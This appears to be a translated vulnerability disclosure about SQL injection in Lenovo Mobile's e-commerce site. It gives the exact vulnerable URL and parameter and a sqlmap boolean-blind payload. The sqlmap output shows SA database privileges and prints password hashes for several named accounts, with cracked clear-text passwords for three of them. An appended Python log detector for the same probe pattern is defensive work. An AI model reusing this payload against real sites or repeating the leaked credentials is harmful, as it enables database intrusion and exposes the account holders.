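2012-08-12: Details reported to the vendor; awaiting vendor handling
2012-08-13: Vendor confirmed; details disclosed to the vendor only
2012-08-23: Details disclosed to core white hats and experts in related fields
2012-09-02: Details disclosed to regular white hats
2012-09-12: Details disclosed to trainee white hats
2012-09-26: Details disclosed to the public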
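I've been injecting for a week and I'm exhausted; I really can't take this any further.
1. This site is the Lenovo Mobile e-commerce system, and it looks pretty impressive: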
http://ec.lenovomobile.com/
2. Injection is possible here:
http://ec.lenovomobile.com/WebForm/Other/Other_download/Other_DownLoad_ListInfo.aspx?List_Name=联想移动合作银行
3. It runs as SA:
4. It can cross into multiple databases:
5. Weak passwords on multiple database accounts:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: List_Name
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: List_Name=联想移动合作银行' AND 6011=6011 AND 'HHoo'='HHoo
---
database management system users password hashes:
[*] sa [1]:
    password hash: 0x0100b067524976ec63baa2ca005f95c57ee92c62e5dc0d2a27072c2812de9a617e1108f39c388b5252c274bebe9e
        header: 0x0100
        salt: b0675249
        mixedcase: 76ec63baa2ca005f95c57ee92c62e5dc0d2a2707
        uppercase: 2c2812de9a617e1108f39c388b5252c274bebe9e
[*] shenjx [1]:
    password hash: 0x01003e74822ba8b269e35e354d5c51ae092ac3fa75a7b1dba093a8b269e35e354d5c51ae092ac3fa75a7b1dba093
        header: 0x0100
        salt: 3e74822b
        mixedcase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093
        uppercase: a8b269e35e354d5c51ae092ac3fa75a7b1dba093
    clear-text password: 654321
[*] swwl [1]:
    password hash: 0x0100b575e507b98bcb343331377b5ba7a26a09e83a51821c2f96fa0950ee393ffbb1980d997bce436645398f0219
        header: 0x0100
        salt: b575e507
        mixedcase: b98bcb343331377b5ba7a26a09e83a51821c2f96
        uppercase: fa0950ee393ffbb1980d997bce436645398f0219
    clear-text password: swwl
[*] wends [1]:
    password hash: 0x01001a76751df147fd28495401d6f84e98be0ba48bb05226b4e1e046486691b981689f41de885727f169f0850578
        header: 0x0100
        salt: 1a76751d
        mixedcase: f147fd28495401d6f84e98be0ba48bb05226b4e1
        uppercase: e046486691b981689f41de885727f169f0850578
    clear-text password: wends
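6. Here is the table listing for the current database [LMECOTHER]; someone had already been here before me and left behind D99 and pangolin temporary tables: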
Database: LMECOTHER
[38 tables]
+--------------------------------------------------+
| dbo.D99_CMD                                      |
| dbo.D99_Tmp                                      |
| dbo.Other_Address_List                           |
| dbo.Other_Address_Org                            |
| dbo.Other_BBS_Forum                              |
| dbo.Other_BBS_ForumGroups                        |
| dbo.Other_BBS_Posts                              |
| dbo.Other_BBS_RePosts                            |
| dbo.Other_BBS_Users                              |
| dbo.Other_ClickStat                              |
| dbo.Other_CusLine                                |
| dbo.Other_CusLine_Type                           |
| dbo.Other_DownLoad_KnowLedge_Type                |
| dbo.Other_DownLoad_List                          |
| dbo.Other_DownLoad_List_Type                     |
| dbo.Other_DownLoad_Pic                           |
| dbo.Other_DownLoad_Tools                         |
| dbo.Other_DownLoad_knowledge                     |
| dbo.Other_Link                                   |
| dbo.Other_Rule                                   |
| dbo.Other_Survey                                 |
| dbo.Other_Survey_Item                            |
| dbo.Other_Survey_Result                          |
| dbo.View_Forum                                   |
| dbo.View_PostList                                |
| dbo.dtproperties                                 |
| dbo.kill_kk                                      |
| dbo.other_CustMailInfo                           |
| dbo.other_CustMailView                           |
| dbo.other_Notice                                 |
| dbo.other_Notice_New                             |
| dbo.other_Notification                           |
| dbo.other_NotificationObj                        |
| dbo.other_NotificationObj_New                    |
| dbo.other_Notification_New                       |
| dbo.pangolin_test_table                          |
| dbo.sysconstraints                               |
| dbo.syssegments                                  |
+--------------------------------------------------+
Just send a gift, what else can you do!
Severity: High
Vulnerability Rank: 15
Confirmed: 2012-08-13 01:07
thank you very much!
None yet
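Added example, not part of the original report: a log check for the boolean-based blind pattern that sqlmap reports above for List_Name (a quote break followed by a constant comparison such as `AND 6011=6011`), generalised to any numeric or quoted-literal comparison. The log layout, client addresses, the `banks` value and `/search.aspx` are constructed for illustration; only the request path and parameter name come from the page.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed log lines (client, method, URL); the request path is the one on the page.
PAGE = "/WebForm/Other/Other_download/Other_DownLoad_ListInfo.aspx"
SAMPLE_LOG = "\n".join([
    f"203.0.113.7 GET {PAGE}?List_Name=banks",
    f"203.0.113.9 GET {PAGE}?List_Name=banks%27%20AND%206011%3D6011%20AND%20%27HHoo%27%3D%27HHoo",
    f"203.0.113.9 GET {PAGE}?List_Name=banks%27%20AND%206011%3D6012%20AND%20%27HHoo%27%3D%27HHoo",
    "203.0.113.7 GET /search.aspx?q=rock+AND+roll",  # benign: no quote, no comparison
])

# AND/OR followed by a constant numeric comparison, e.g. "AND 6011=6011".
NUM_CMP = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*(\d+)", re.I)
# Two quoted literals compared, e.g. "'HHoo'='HHoo" (the application adds the last quote).
STR_CMP = re.compile(r"'(\w*)'\s*=\s*'(\w*)")


def classify(value):
    """Return 'true-probe', 'false-probe' or None for one decoded parameter value."""
    if "'" not in value:  # the page's payload first breaks out of a string literal
        return None
    m = NUM_CMP.search(value) or STR_CMP.search(value)
    if not m:
        return None
    return "true-probe" if m.group(1) == m.group(2) else "false-probe"


def detect(log_text):
    """Map (client, path, parameter) to the sorted probe kinds seen for it."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip lines that do not match the constructed layout
        client, _method, url = parts
        split = urlsplit(url)
        # parse_qsl percent-decodes names and values and turns '+' into a space.
        for name, value in parse_qsl(split.query, keep_blank_values=True):
            kind = classify(value)
            if kind:
                seen[(client, split.path, name)].add(kind)
    return {key: sorted(kinds) for key, kinds in seen.items()}


if __name__ == "__main__":
    for key, kinds in detect(SAMPLE_LOG).items():
        print(key, kinds)
```

A client that sends both a true and a false probe against the same parameter is the strongest signal, since that pairing is how boolean-based blind extraction compares responses.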